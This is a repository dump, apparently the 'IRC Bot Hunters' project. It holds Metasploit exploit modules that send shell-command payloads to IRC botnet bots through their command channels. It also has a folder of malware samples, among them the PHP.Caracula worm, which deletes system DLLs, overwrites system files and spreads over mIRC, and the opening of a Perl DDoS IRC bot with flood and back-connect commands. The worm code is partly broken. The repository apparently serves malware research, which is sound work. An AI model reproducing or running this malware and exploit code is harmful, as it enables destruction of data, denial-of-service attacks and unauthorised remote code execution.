├── LICENSE
├── README.md
├── kaiten_exec.rb
├── legend_bot_exec.rb
├── malicious_samples
    ├── RC-Worm.PHP.Caracula
    ├── README.md
    ├── [QBOT Leak] Prometheus v4.c
    ├── banyak_irc.pl
    ├── bossabot.c
    ├── geoip.php
    ├── kaiten.c
    ├── legend.txt
    ├── magscan?.txt
    ├── mma.php
    ├── open_source_repos.md
    ├── pbot.php
    ├── timthumbscanner.txt
    └── w3tw0rk.txt
├── pbot_exec.rb
├── w3tw0rk_exec.rb
└── xdh_x_exec.rb


/LICENSE:
--------------------------------------------------------------------------------
 1 | The MIT License (MIT)
 2 | 
 3 | Copyright (c) 2015 JT
 4 | 
 5 | Permission is hereby granted, free of charge, to any person obtaining a copy
 6 | of this software and associated documentation files (the "Software"), to deal
 7 | in the Software without restriction, including without limitation the rights
 8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
 9 | copies of the Software, and to permit persons to whom the Software is
10 | furnished to do so, subject to the following conditions:
11 | 
12 | The above copyright notice and this permission notice shall be included in all
13 | copies or substantial portions of the Software.
14 | 
15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
21 | SOFTWARE.
22 | 
23 | 


--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
 1 | # IRC Bot Hunters
 2 | a collection of Metasploit PoC exploits I wrote for IRC Botnets that takes over the owner of a bot which then allows Remote Code Execution. Most IRC Botnets can be taken over by using their herders' usernames or by triggering a certain command which does shell execution. Almost all of the modules here have been accepted in the Metasploit repository. If you are looking for C&C exploit modules or pwning backdoors like r57 / c99 shell, I have also made [some modules](https://github.com/rapid7/metasploit-framework/search?utf8=%E2%9C%93&q=jay+turla) which I have pushed in the main msf repository.
 3 | 
 4 | ![image](https://cloud.githubusercontent.com/assets/3483615/9675972/44986a28-52f7-11e5-8c1a-76cabf835cb6.png)
 5 | 
 6 | # Accepted Metasploit Modules
 7 | 
 8 | w3tw0rk / Pitbul IRC Bot  Remote Code Execution - https://www.rapid7.com/db/modules/exploit/multi/misc/w3tw0rk_exec
 9 | 
10 | Legend Perl IRC Bot Remote Code Execution - https://www.rapid7.com/db/modules/exploit/multi/misc/legend_bot_exec
11 | 
12 | Xdh / LinuxNet Perlbot / fBot IRC Bot Remote Code Execution - https://www.rapid7.com/db/modules/exploit/multi/misc/xdh_x_exec
13 | 
14 | PHP IRC Bot pbot eval() Remote Code Execution (Credited Only) - https://www.rapid7.com/db/modules/exploit/multi/misc/pbot_exec
15 | 
16 | # Some References
17 | w3tw0rk / Pitbull Perl IRC Bot Remote Code Execution PoC Exploit - https://www.exploit-db.com/exploits/36652/
18 | 
19 | Legend Perl IRC Bot - Remote Code Execution  - https://www.exploit-db.com/exploits/36836/
20 | 
21 | # Inspiration
22 | - MalwareMustDie!
23 | 
24 | # Request for Metasploit Modules?
25 | Want an IRC bot pwned or you have an exploit for an IRC bot that you want to be ported to msf? Contact me at shipcodez@gmail.com
26 | 
27 | I am always open for suggestions and new modules as long as you give me details and analysis of a new IRC bot in the wild. Save the world from cavities!!!
28 | 


--------------------------------------------------------------------------------
/kaiten_exec.rb:
--------------------------------------------------------------------------------
  1 | ##
  2 | # This module requires Metasploit: http://metasploit.com/download
  3 | # Current source: https://github.com/rapid7/metasploit-framework
  4 | ##
  5 | 
  6 | require 'msf/core'
  7 | 
  8 | 
  9 | class MetasploitModule < Msf::Exploit::Remote
 10 |   Rank = ExcellentRanking
 11 | 
 12 |   include Msf::Exploit::Remote::Tcp
 13 | 
 14 |   def initialize(info = {})
 15 |     super(update_info(info,
 16 |       'Name'           => 'Kaiten DDoS IRC Bot  Remote Code Execution',
 17 |       'Description'    => %q{
 18 |           This module exploits the remote command execution vulnerability on the kaiten IRC Bot.
 19 |           kaiten is a known IRC based distributed denial of service client which accepts commands
 20 |           through its administrator via IRC.
 21 |         },
 22 |       'Author'         =>
 23 |         [
 24 |           'Jay Turla'
 25 |         ],
 26 |       'License'        => MSF_LICENSE,
 27 |       'References'     =>
 28 |         [
 29 |           [ 'URL', 'http://blog.trendmicro.com/trendlabs-security-intelligence/shellshock-vulnerability-downloads-kaiten-source-code/' ],
 30 |           [ 'URL', 'http://blog.malwaremustdie.org/2013/05/story-of-unix-trojan-tsunami-ircbot-w.html' ] #MalwareMustDie
 31 |         ],
 32 |       'Platform'       => %w{ unix win },
 33 |       'Arch'           => ARCH_CMD,
 34 |       'Payload'        =>
 35 |         {
 36 |           'Space'    => 300, # According to RFC 2812, the max length message is 512, including the cr-lf
 37 |           'DisableNops' => true,
 38 |           'Compat'      =>
 39 |             {
 40 |               'PayloadType' => 'cmd',
 41 |             }
 42 |         },
 43 |       'Targets'  =>
 44 |         [
 45 |           [ 'kaiten', { } ]
 46 |         ],
 47 |       'Privileged'     => false,
 48 |       'DisclosureDate' => 'Oct 16 2015',
 49 |       'DefaultTarget'  => 0))
 50 | 
 51 |     register_options(
 52 |       [
 53 |         Opt::RPORT(6667),
 54 |         OptString.new('IRC_PASSWORD', [false, 'IRC Connection Password', '']),
 55 |         OptString.new('NICK', [true, 'IRC Nickname', 'msf_user']),
 56 |         OptString.new('CHANNEL', [true, 'IRC Channel', '#channel'])
 57 |       ], self.class)
 58 |   end
 59 | 
 60 |   def check
 61 |     connect
 62 | 
 63 |     response = register(sock)
 64 |     if response =~ /463/ or response =~ /464/
 65 |       vprint_error("#{rhost}:#{rport} - Connection to the IRC Server not allowed")
 66 |       return Exploit::CheckCode::Unknown
 67 |     end
 68 | 
 69 |     response = join(sock)
 70 |     if not response =~ /353/ and not response =~ /366/
 71 |       vprint_error("#{rhost}:#{rport} - Error joining the #{datastore['CHANNEL']} channel")
 72 |       return Exploit::CheckCode::Unknown
 73 |     end
 74 | 
 75 |     quit(sock)
 76 |     disconnect
 77 | 
 78 |     if response =~ /auth/ and response =~ /logged in/
 79 |       return Exploit::CheckCode::Vulnerable
 80 |     else
 81 |       return Exploit::CheckCode::Safe
 82 |     end
 83 |   end
 84 | 
 85 |   def send_msg(sock, data)
 86 |     sock.put(data)
 87 |     data = ""
 88 |     begin
 89 |       read_data = sock.get_once(-1, 1)
 90 |       while not read_data.nil?
 91 |         data << read_data
 92 |         read_data = sock.get_once(-1, 1)
 93 |       end
 94 |     rescue ::EOFError, ::Timeout::Error, ::Errno::ETIMEDOUT => e
 95 |       elog("#{e.class} #{e.message}\n#{e.backtrace * "\n"}")
 96 |     end
 97 | 
 98 |     data
 99 |   end
100 | 
101 |   def register(sock)
102 |     msg = ""
103 | 
104 |     if datastore['IRC_PASSWORD'] and not datastore['IRC_PASSWORD'].empty?
105 |       msg << "PASS #{datastore['IRC_PASSWORD']}\r\n"
106 |     end
107 | 
108 |     if datastore['NICK'].length > 9
109 |       nick = rand_text_alpha(9)
110 |       print_error("The nick is longer than 9 characters, using #{nick}")
111 |     else
112 |       nick = datastore['NICK']
113 |     end
114 | 
115 |     msg << "NICK #{nick}\r\n"
116 |     msg << "USER #{nick} #{Rex::Socket.source_address(rhost)} #{rhost} :#{nick}\r\n"
117 | 
118 |     response = send_msg(sock,msg)
119 |     return response
120 |   end
121 | 
122 |   def join(sock)
123 |     join_msg = "JOIN #{datastore['CHANNEL']}\r\n"
124 |     response = send_msg(sock, join_msg)
125 |     return response
126 |   end
127 | 
128 |   def kaiten_command(sock)
129 |     encoded = payload.encoded
130 |     command_msg = "PRIVMSG #{datastore['CHANNEL']} :!* SH #{encoded}\r\n"
131 |     response = send_msg(sock, command_msg)
132 |     return response
133 |   end
134 | 
135 |   def quit(sock)
136 |     quit_msg = "QUIT :bye bye\r\n"
137 |     sock.put(quit_msg)
138 |   end
139 | 
140 |   def exploit
141 |     connect
142 | 
143 |     print_status("#{peer} - Registering with the IRC Server...")
144 |     response = register(sock)
145 |     if response =~ /463/ or response =~ /464/
146 |       print_error("#{rhost}:#{rport} - Connection to the IRC Server not allowed")
147 |       return
148 |     end
149 | 
150 |     print_status("#{peer} - Joining the #{datastore['CHANNEL']} channel...")
151 |     response = join(sock)
152 |     if not response =~ /353/ and not response =~ /366/
153 |       print_error("#{rhost}:#{rport} - Error joining the #{datastore['CHANNEL']} channel")
154 |       return
155 |     end
156 | 
157 |     print_status("#{peer} - Exploiting the kaiten IRC bot...")
158 |     kaiten_command(sock)
159 | 
160 |     quit(sock)
161 |     disconnect
162 |   end
163 | end
164 | 


--------------------------------------------------------------------------------
/legend_bot_exec.rb:
--------------------------------------------------------------------------------
  1 | ##
  2 | # This module requires Metasploit: http://metasploit.com/download
  3 | # Current source: https://github.com/rapid7/metasploit-framework
  4 | ##
  5 | 
  6 | require 'msf/core'
  7 | 
  8 | class MetasploitModule < Msf::Exploit::Remote
  9 | 
 10 |   Rank = ExcellentRanking
 11 | 
 12 |   include Msf::Exploit::Remote::Tcp
 13 | 
 14 |   def initialize(info = {})
 15 |     super(update_info(info,
 16 |       'Name'           => 'Legend Perl IRC Bot Remote Code Execution',
 17 |       'Description'    => %q{
 18 |           This module exploits a remote command execution on the Legend Perl IRC Bot .
 19 |           This bot has been used as a payload in the Shellshock spam last October 2014.
 20 |           This particular bot has functionalities like NMAP scanning, TCP, HTTP, SQL, and
 21 |           UDP flooding, the ability to remove system logs, and ability to gain root, and
 22 |           VNC scanning.
 23 | 
 24 |           Kevin Stevens, a Senior Threat Researcher at Damballa  has uploaded this script
 25 |           to VirusTotal with a md5 of 11a9f1589472efa719827079c3d13f76.
 26 |         },
 27 |       'Author'         =>
 28 |         [
 29 |           'Jay Turla' # msf and initial discovery
 30 |         ],
 31 |       'License'        => MSF_LICENSE,
 32 |       'References'     =>
 33 |         [
 34 |           [ 'OSVDB', '121681' ],
 35 |           [ 'EDB', '36836' ],
 36 |           [ 'URL', 'https://www.damballa.com/perlbotnado/' ],
 37 |           [ 'URL', 'http://www.csoonline.com/article/2839054/vulnerabilities/report-criminals-use-shellshock-against-mail-servers-to-build-botnet.html' ] # Shellshock spam October 2014 details
 38 |         ],
 39 |       'Platform'       => %w{ unix win },
 40 |       'Arch'           => ARCH_CMD,
 41 |       'Payload'        =>
 42 |         {
 43 |           'Space'    => 300, # According to RFC 2812, the max length message is 512, including the cr-lf
 44 |           'DisableNops' => true,
 45 |           'Compat'      =>
 46 |             {
 47 |               'PayloadType' => 'cmd'
 48 |             }
 49 |         },
 50 |       'Targets'  =>
 51 |         [
 52 |           [ 'Legend IRC Bot', { } ]
 53 |         ],
 54 |       'Privileged'     => false,
 55 |       'DisclosureDate' => 'Apr 27 2015',
 56 |       'DefaultTarget'  => 0))
 57 | 
 58 |     register_options(
 59 |       [
 60 |         Opt::RPORT(6667),
 61 |         OptString.new('IRC_PASSWORD', [false, 'IRC Connection Password', '']),
 62 |         OptString.new('NICK', [true, 'IRC Nickname', 'msf_user']),
 63 |         OptString.new('CHANNEL', [true, 'IRC Channel', '#channel'])
 64 |       ], self.class)
 65 |   end
 66 | 
 67 |   def check
 68 |     connect
 69 | 
 70 |     res = register(sock)
 71 |     if res =~ /463/ || res =~ /464/
 72 |       vprint_error("#{rhost}:#{rport} - Connection to the IRC Server not allowed")
 73 |       return Exploit::CheckCode::Unknown
 74 |     end
 75 | 
 76 |     res = join(sock)
 77 |     if !res =~ /353/ && !res =~ /366/
 78 |       vprint_error("#{rhost}:#{rport} - Error joining the #{datastore['CHANNEL']} channel")
 79 |       return Exploit::CheckCode::Unknown
 80 |     end
 81 | 
 82 |     quit(sock)
 83 |     disconnect
 84 | 
 85 |     if res =~ /auth/ && res =~ /logged in/
 86 |       Exploit::CheckCode::Vulnerable
 87 |     else
 88 |       Exploit::CheckCode::Safe
 89 |     end
 90 |   end
 91 | 
 92 |   def send_msg(sock, data)
 93 |     sock.put(data)
 94 |     data = ""
 95 |     begin
 96 |       read_data = sock.get_once(-1, 1)
 97 |       while !read_data.nil?
 98 |         data << read_data
 99 |         read_data = sock.get_once(-1, 1)
100 |       end
101 |     rescue ::EOFError, ::Timeout::Error, ::Errno::ETIMEDOUT => e
102 |       elog("#{e.class} #{e.message}\n#{e.backtrace * "\n"}")
103 |     end
104 | 
105 |     data
106 |   end
107 | 
108 |   def register(sock)
109 |     msg = ""
110 | 
111 |     if datastore['IRC_PASSWORD'] && !datastore['IRC_PASSWORD'].empty?
112 |       msg << "PASS #{datastore['IRC_PASSWORD']}\r\n"
113 |     end
114 | 
115 |     if datastore['NICK'].length > 9
116 |       nick = rand_text_alpha(9)
117 |       print_error("The nick is longer than 9 characters, using #{nick}")
118 |     else
119 |       nick = datastore['NICK']
120 |     end
121 | 
122 |     msg << "NICK #{nick}\r\n"
123 |     msg << "USER #{nick} #{Rex::Socket.source_address(rhost)} #{rhost} :#{nick}\r\n"
124 | 
125 |     send_msg(sock,msg)
126 |   end
127 | 
128 |   def join(sock)
129 |     join_msg = "JOIN #{datastore['CHANNEL']}\r\n"
130 |     send_msg(sock, join_msg)
131 |   end
132 | 
133 |   def legend_command(sock)
134 |     encoded = payload.encoded
135 |     command_msg = "PRIVMSG #{datastore['CHANNEL']} :!legend #{encoded}\r\n"
136 |     send_msg(sock, command_msg)
137 |   end
138 | 
139 |   def quit(sock)
140 |     quit_msg = "QUIT :bye bye\r\n"
141 |     sock.put(quit_msg)
142 |   end
143 | 
144 |   def exploit
145 |     connect
146 | 
147 |     print_status("#{rhost}:#{rport} - Registering with the IRC Server...")
148 |     res = register(sock)
149 |     if res =~ /463/ || res =~ /464/
150 |       print_error("#{rhost}:#{rport} - Connection to the IRC Server not allowed")
151 |       return
152 |     end
153 | 
154 |     print_status("#{rhost}:#{rport} - Joining the #{datastore['CHANNEL']} channel...")
155 |     res = join(sock)
156 |     if !res =~ /353/ && !res =~ /366/
157 |       print_error("#{rhost}:#{rport} - Error joining the #{datastore['CHANNEL']} channel")
158 |       return
159 |     end
160 | 
161 |     print_status("#{rhost}:#{rport} - Exploiting the malicious IRC bot...")
162 |     legend_command(sock)
163 | 
164 |     quit(sock)
165 |     disconnect
166 |   end
167 | 
168 | end
169 | 


--------------------------------------------------------------------------------
/malicious_samples/RC-Worm.PHP.Caracula:
--------------------------------------------------------------------------------
  1 | <?php
  2 | // PHP.Caracula By Xmorfic/BCVG
  3 | // First PHP worm... using mirc to spread 
  4 | // Overwrting virus. Infects html, htm, php, sys, vxd, bat, ocx files.
  5 | // overwrites all sys,exe,ocx,bat,vxd files in c:\windows\system\
  6 | // add a string to all html, htm ,php that will contain the virus.
  7 | // deletes some dll files from c:\windows\system
  8 | // 
  9 | //
 10 | 
 11 | $msdos = 'C:\Msdos.sys';
 12 | $mirc = 'C:\Mirc\script.ini';
 13 | $mirc_s = 'C:\Mirs32\script.ini';
 14 | $mirc_t = 'C:\ProgramFiles\Mirc\script.ini';
 15 | $newdir = 'C:\_msphp';
 16 | $newdir_f = 'C:\_msphp\msphp.ini';
 17 | $config = 'C:\Config.sys';
 18 | $reg = 'C:\Windows\regedit.exe';
 19 | $dll_o = 'C:\Windows\System\Mshtml.dll'
 20 | $dll_t = 'C:\Windows\System\Wsock.vxd';
 21 | $dll_th = 'C:\Windows\System\Winspool.drv';
 22 | $dll_f = 'C:\Windows\System\vxblock.dll';
 23 | 
 24 | $ree = "Are you ready to slide with Caracula ???";
 25 | $string = "PHP.Caracula by Xmorfic/BCVG , Copyright (c) Xmorifc 2001, www.bcvgvx.cjb.net";
 26 | $string_o = "LOADING........";
 27 | $string_q = "Unable to load IE??9.sys file Please reboot your computer and try again";
 28 | 
 29 | 	echo $string_o;
 30 | 
 31 | 	$nome = true;
 32 | 
 33 | 	if ( (file_exists($mirc) )
 34 | 	{
 35 | 		$infmirc_a = fopen($mirc, "r");
 36 | 		$check_a   = fread($infmirc, filesize($mirc);
 37 | 		$me_a      = strstr($check, 'ms.php');
 38 | 		if (!$me) $nome = false;
 39 | 		
 40 | 		if ( ($nome=false) )
 41 | 		{
 42 | 			$a = unlink($mirc);
 43 | 			$b = touch($mirc);
 44 | 
 45 | 			$m_irc = fopen($mirc, "a");
 46 | 			$fputs($m_irc, "[Script]");
 47 | 			$fputs($m_irc, "n0=; PHP.Caracula");
 48 | 			$fputs($m_irc, "n1=; By Xmorfic");
 49 | 			$fputs($m_irc, "n2=; Do not edit!");
 50 | 			$fputs($m_irc, "n3=ON 1:JOIN:#:{");
 51 | 			$fputs($m_irc, "n4=  /if ( $nick == $me) {halt}");
 52 | 			$fputs($m_irc, "n5= /.dcc send $nick c:\_msphp\ms.php");
 53 | 			$fputs($m_irc, "n6=}");
 54 | 			return;
 55 | 		}
 56 | 	}
 57 | 	fclose($mirc);
 58 | 	$nome = true;
 59 | 	
 60 | 	if ( (file_exists($mirc_s) )
 61 | 	{
 62 | 		$infmirc_b = fopen($mirc_s, "r");
 63 | 		$check_b   = fread($infmirc_b, filesize($mirc_s);
 64 | 		$me_b      = strstr($check_b, 'ms.php');
 65 | 		if (!$me_b) $nome = false;
 66 | 		
 67 | 		if ( ($nome=false) )
 68 | 		{
 69 | 			$c = unlink($mirc_s);
 70 | 			$d = touch($mirc_s);
 71 | 
 72 | 			$m_irc = fopen($mirc_s, "a");
 73 | 			$fputs($m_irc, "[Script]");
 74 | 			$fputs($m_irc, "n0=; PHP.Caracula");
 75 | 			$fputs($m_irc, "n1=; By Xmorfic");
 76 | 			$fputs($m_irc, "n2=; Do not edit!");
 77 | 			$fputs($m_irc, "n3=ON 1:JOIN:#:{");
 78 | 			$fputs($m_irc, "n4=  /if ( $nick == $me) {halt}");
 79 | 			$fputs($m_irc, "n5= /.dcc send $nick c:\_msphp\ms.php");
 80 | 			$fputs($m_irc, "n6=}");
 81 | 			return;
 82 | 		}
 83 | 	}
 84 | 	fclose($mirc_s);
 85 | 	$nome = true;
 86 | 
 87 | 	if ( (file_exists($mirc_t) )
 88 | 	{
 89 | 		$infmirc_c = fopen($mirc_t, "r");
 90 | 		$check_c   = fread($infmirc_c, filesize($mirc_t);
 91 | 		$me_c      = strstr($check_c, 'ms.php');
 92 | 		if (!$me_c) $nome = false;
 93 | 		
 94 | 		if ( ($nome=false) )
 95 | 		{
 96 | 			$e = unlink($mirc_t);
 97 | 			$f = touch($mirc_t);
 98 | 
 99 | 			$m_irc = fopen($mirc_t, "a");
100 | 			$fputs($m_irc, "[Script]");
101 | 			$fputs($m_irc, "n0=; PHP.Caracula");
102 | 			$fputs($m_irc, "n1=; By Xmorfic");
103 | 			$fputs($m_irc, "n2=; Do not edit!");
104 | 			$fputs($m_irc, "n3=ON 1:JOIN:#:{");
105 | 			$fputs($m_irc, "n4=  /if ( $nick == $me) {halt}");
106 | 			$fputs($m_irc, "n5= /.dcc send $nick c:\_msphp\ms.php");
107 | 			$fputs($m_irc, "n6=}");
108 | 			return;
109 | 		}
110 | 
111 | 	}
112 | 	fclose($mirc_t);
113 | 	$nome = true;
114 | 
115 | 	$g = mkdir($newdir,0)
116 | 	$h = touch($newdir_f)
117 | 	
118 | 	if ( (file_exists($newdir_f)
119 | 	{
120 | 		$new_ini = fopen($newdir_f, "a");
121 | 		$fputs($new_ini, "[MSPHP]");
122 | 		$fputs($new_ini, "Microsoft PHP Support");
123 | 		$fputs($new_ini, "This folder and the ms.php file into it will help your computer");
124 | 		$fputs($new_ini, "and you web browser to move one step more into the world of PHP.");
125 | 		$fputs($new_ini, "Microsoft wants you to enjoy the high technology available on the");
126 | 		$fputs($new_ini, "net in this day, so to make this ability Microsoft developed a new");
127 | 		$fputs($new_ini, "product named MSPHP that will help you and your computer to know");
128 | 		$fputs($new_ini, "the PHP language.");
129 | 		$fputs($new_ini, "This folder was created automaticly bu MSInternetExplorer Live Update");
130 | 		$fputs($new_ini, "if you want to uninstall this options do not delete the folder or the");
131 | 		$fputs($new_ini, "file because then you may cause damage to your computer just send email"); to msphp@microsoft.com and we will tell you how");
132 | 		$fputs($new_ini, "to msphp@microsoft.com and we will tell you how to uninstall it.");
133 | 		$fputs($new_ini, "Copyright Microsoft (c) 2001");
134 | 		return;
135 | 	}
136 | 	fclose($new_ini);
137 | 
138 | 	$i = unlink($msdos);
139 | 	$j = touch($msdos);
140 | 
141 | 	if ( (file_exists($msdos) )
142 | 	{
143 | 		$new_msdos = fopen($msdos, "a");
144 | 		$fputs($new_msdos, "[Paths]");
145 | 		$fputs($new_msdos, "WinDir=G:\_Sym\Microsoft\Windows");
146 | 		$fputs($new_msdos, "WinBootDir=A:\System\ini");
147 | 		$fputs($new_msdos, "HostWinBootDrv=R");
148 | 		$fputs($new_msdos, "");
149 | 		$fputs($new_msdos, "[OPTIONS]");
150 | 		$fputs($new_msdos, "BootMulti=6");
151 | 		$fputs($new_msdos, "WinVer=Infected Version");
152 | 		$fputs($new_msdos, "MsDos By Microsoft");
153 | 		$fputs($new_msdos, "xxxxxxxxxxxxxxxxxxxxxxxxx");
154 | 		return;
155 | 	
156 | 	}
157 | 	fclose($msdos);
158 | 
159 | 	unlink($config);
160 | 	touch($config);
161 | 
162 | 	if ( (file_exists($config) )
163 | 	{
164 | 		$new_config = fopen($config, "a");
165 | 		$fputs($new_config, "[Windows]");
166 | 		$fputs($new_config, "device=C:\Windows\??ss.sys");
167 | 		$fputs($new_config, "device=C:\_msdos\90.sys");
168 | 		$fputs($new_config, "device=C:\Windows\notepad.exe");
169 | 		$fputs($new_config, "Are you ready to slide ?????");
170 | 		return;
171 | 	}
172 | 	fclose($config);
173 | 	
174 | 	$l = unlink($reg);
175 | 	$m = unlink($dll_o);
176 | 	$n = unlink($dll_t);
177 | 	$o = unlink($dll_th);
178 | 	$p = unlink($dll_f);
179 | 
180 | 	$y = rename(__FILE__, 'caracula.php');
181 | 	$x = copy(__FILE__, 'C:\_msphp');
182 | 	$w = rename('C:\_msphp\caracula.php', 'ms.php');
183 | 
184 | 	
185 | // search for html, htm, php files in current directory
186 | 
187 | $aa = opendir('.');
188 | while ($bb = readdir($aa))
189 | {
190 | 	$inf = true;
191 | 	$last = false;
192 | 
193 | 	if ( ($last = strstr ($bb, '.php')) || ($last = strstr ($bb, '.html')) || ($last = strstr ($bb, '.htm')) )
194 | 	if ( is_file($bb) && is_writeable($bb) )
195 | 	{
196 | 		
197 | 		
198 | 		$new = fopen($bb, "r");
199 | 		$look = fread($new, filesize($bb));
200 | 		$yes = strstr ($look, 'caracula.php');
201 | 		if (!$yes) $inf = false;
202 | 	}
203 | 	
204 | 	if ( ($inf=false) )
205 | 	{
206 | 		$new = fopen($bb, "a");
207 | 		$fputs($new, "<?php ");
208 | 		$fputs($new, "include(\"");
209 | 		$fputs($new, __FILE__);
210 | 		$fputs($new, "\"); ");
211 | 		$fputs($new, "?>");
212 | 		return;
213 | 	}
214 | }
215 | closedir($aa);
216 | 
217 | 
218 | 
219 | 
220 | 
221 | 
222 | 
223 | 
224 | 
225 | // search for ocx, sys, bat, exe, vxd file in c:\windows\system\
226 | 
227 | $systems = opendir('C:\Windows\System');
228 | 	while ($filesys = readdir($systems))
229 | 	{
230 | 
231 | 		$infected = true;
232 | 		$systemexe = false;
233 | 
234 | 		if ( ($systemexe = strstr ($filesys, '.sys')) || ($systemexe = strstr ($filesys, '.vxd')) || ($systemexe = strstr ($filesys, '.bat')) || ($systemexe = strstr ($filesys, '.exe')) || ($systemexe = strstr ($filesys, '.ocx')) )
235 | 		if ( (is_writeable($filesys) )
236 | 		{
237 | 		
238 | 			$sysk = fopen($filesys, "r");
239 | 			$xst  = fread($sysk, filesize($filesys);
240 | 			$good = strstr ($xst, 'Are you ready to slide with Caracula ???');
241 | 			if (!$good) $infected = false;
242 | 		}
243 | 
244 | 		if ( ($infected=false) )
245 | 		{
246 | 			$sysk = fopen($filesys, "a");
247 | 			$fputs($sysk, "Are you read to slide with Caracula ??? I'm ready but you don't!!! PHP.Caracula - slide now");
248 | 			return;
249 | 		}
250 | 	}
251 | 	closedir($systems);
252 | 
253 | 
254 | 	echo $ree;
255 | 	echo $string_q;
256 | 
257 | ?>
258 | 	
259 | 	
260 | 	
261 | 
262 | 	
263 | 
264 | 	
265 | 


--------------------------------------------------------------------------------
/malicious_samples/README.md:
--------------------------------------------------------------------------------
1 | Warning!!! These are malicious files and are for educational purposes.
2 | 
3 | All the files in this directory are not mine
4 | 


--------------------------------------------------------------------------------
/malicious_samples/banyak_irc.pl:
--------------------------------------------------------------------------------
   1 | #!/usr/bin/perl
   2 | 
   3 | #-Charles-220513- (@Command List shipcode_jjt)
   4 | #-Charles-220513- (@Copyright (C) 2007)
   5 | #-Charles-220513- <————————————————>
   6 | #-Charles-220513- (!bht) (@help)
   7 | #-Charles-220513- (!bht) (@portscan) <IP/domain Name>
   8 | #-Charles-220513- (!bht) (@udpflood) <IP> <packet-size> <time>
   9 | #-Charles-220513- (!bht) (@tcpflood) <IP> <port> <time>
  10 | #-Charles-220513- (!bht) (@httpflood) <www.website.com> <time>
  11 | #-Charles-220513- (!bht) (@say) <msg>
  12 | #-Charles-220513- (!bht) (@join) <#>
  13 | #-Charles-220513- (!bht) (@part) <#>
  14 | #-Charles-220513- (!bht) (@nick) <nick>
  15 | #-Charles-220513- (!bht) (@msg) <#/nick>
  16 | #-Charles-220513- (!bht) (@tsunami) <banyak pesan> <#/nick> <msg>
  17 | #-Charles-220513- (!bht) (@op) <nick>
  18 | #-Charles-220513- (!bht) (@deop) <nick>
  19 | #-Charles-220513- (!bht) (@voice) <nick>
  20 | #-Charles-220513- (!bht) (@devoice) <nick>
  21 | #-Charles-220513- (!bht) (@reset)
  22 | #-Charles-220513- (!bht) (@die) <msg>
  23 | #-Charles-220513- Charles (@back) <ip> <port>
  24 | #-Charles-220513- Charles (@command² di atas)
  25 | #-Charles-220513- <————————————————>
  26 | 
  27 | #use LWP::UserAgent;
  28 | 
  29 | my $linas_max = '5';
  30 | my $sleep = '7';
  31 | my $VERSAO = "2.3.4-1";
  32 | my @nickname = ("Ackerman",
  33 | "Adams",
  34 | "Addison",
  35 | "Adelstein",
  36 | "Adibe",
  37 | "Adorno",
  38 | "Ahlers",
  39 | "Alavi",
  40 | "Alcorn",
  41 | "Alda",
  42 | "Aleks",
  43 | "Allison",
  44 | "Alongi",
  45 | "Altavilla",
  46 | "Altenberger",
  47 | "Altenhofen",
  48 | "Amaral",
  49 | "Amatangelo",
  50 | "Ameer",
  51 | "Amsden",
  52 | "Anand",
  53 | "Andel",
  54 | "Ando",
  55 | "Andrelus",
  56 | "Andron",
  57 | "Anfinrud",
  58 | "Ansley",
  59 | "Anthony",
  60 | "Antos",
  61 | "Arbia",
  62 | "Arduini",
  63 | "Arellano",
  64 | "Aristotle",
  65 | "Arjas",
  66 | "Arky",
  67 | "Atkins",
  68 | "Augustus",
  69 | "Aurelius",
  70 | "Axelrod",
  71 | "Axworthy",
  72 | "Ayiemba",
  73 | "Aykroyd",
  74 | "Ayling",
  75 | "Azima",
  76 | "Bachmuth",
  77 | "Backus",
  78 | "Bady",
  79 | "Baglivo",
  80 | "Bagnold",
  81 | "Bailar",
  82 | "Bakanowsky",
  83 | "Baleja",
  84 | "Ballatori",
  85 | "Ballew",
  86 | "Baltz",
  87 | "Banta",
  88 | "Barabesi",
  89 | "Barajas",
  90 | "Baranczak",
  91 | "Baranowska",
  92 | "Barberi",
  93 | "Barbetti",
  94 | "Barneson",
  95 | "Barnett",
  96 | "Barriola",
  97 | "Barry",
  98 | "Bartholomew",
  99 | "Bartolome",
 100 | "Bartoo",
 101 | "Basavappa",
 102 | "Bashevis",
 103 | "Batchelder",
 104 | "Baumiller",
 105 | "Bayles",
 106 | "Bayo",
 107 | "Beacon",
 108 | "Beal",
 109 | "Bean",
 110 | "Beckman",
 111 | "Beder",
 112 | "Bedford",
 113 | "Behenna",
 114 | "Belanger",
 115 | "Belaoussof",
 116 | "Belfer",
 117 | "Belin-Collart",
 118 | "Bellavance",
 119 | "Bellhouse",
 120 | "Bellini",
 121 | "Belloc",
 122 | "Benedict-Dye",
 123 | "Bergson",
 124 | "Berke-Jenkins",
 125 | "Bernardo",
 126 | "Bernassola",
 127 | "Bernston",
 128 | "Berrizbeitia",
 129 | "Betti",
 130 | "Beynart",
 131 | "Biagioli",
 132 | "Bickel",
 133 | "Binion",
 134 | "Bir",
 135 | "Bisema",
 136 | "Bisho",
 137 | "Blackbourn",
 138 | "Blackwell",
 139 | "Blagg",
 140 | "Blakemore",
 141 | "Blanke",
 142 | "Bliss",
 143 | "Blizard",
 144 | "Bloch",
 145 | "Bloembergen",
 146 | "Bloemhof",
 147 | "Bloxham",
 148 | "Blyth",
 149 | "Bolger",
 150 | "Bolick",
 151 | "Bollinger",
 152 | "Bologna",
 153 | "Boner",
 154 | "Bonham",
 155 | "Boniface",
 156 | "Bontempo",
 157 | "Book",
 158 | "Bookbinder",
 159 | "Boone",
 160 | "Boorstin",
 161 | "Borack",
 162 | "Borden",
 163 | "Bossi",
 164 | "Bothman",
 165 | "Botosh",
 166 | "Boudin",
 167 | "Boudrot",
 168 | "Bourneuf",
 169 | "Bowers",
 170 | "Boxer",
 171 | "Boyajian",
 172 | "Boyes",
 173 | "Boyland",
 174 | "Boym",
 175 | "Boyne",
 176 | "Bracalente",
 177 | "Bradac",
 178 | "Bradach",
 179 | "Brecht",
 180 | "Breed",
 181 | "Brenan",
 182 | "Brennan",
 183 | "Brewer",
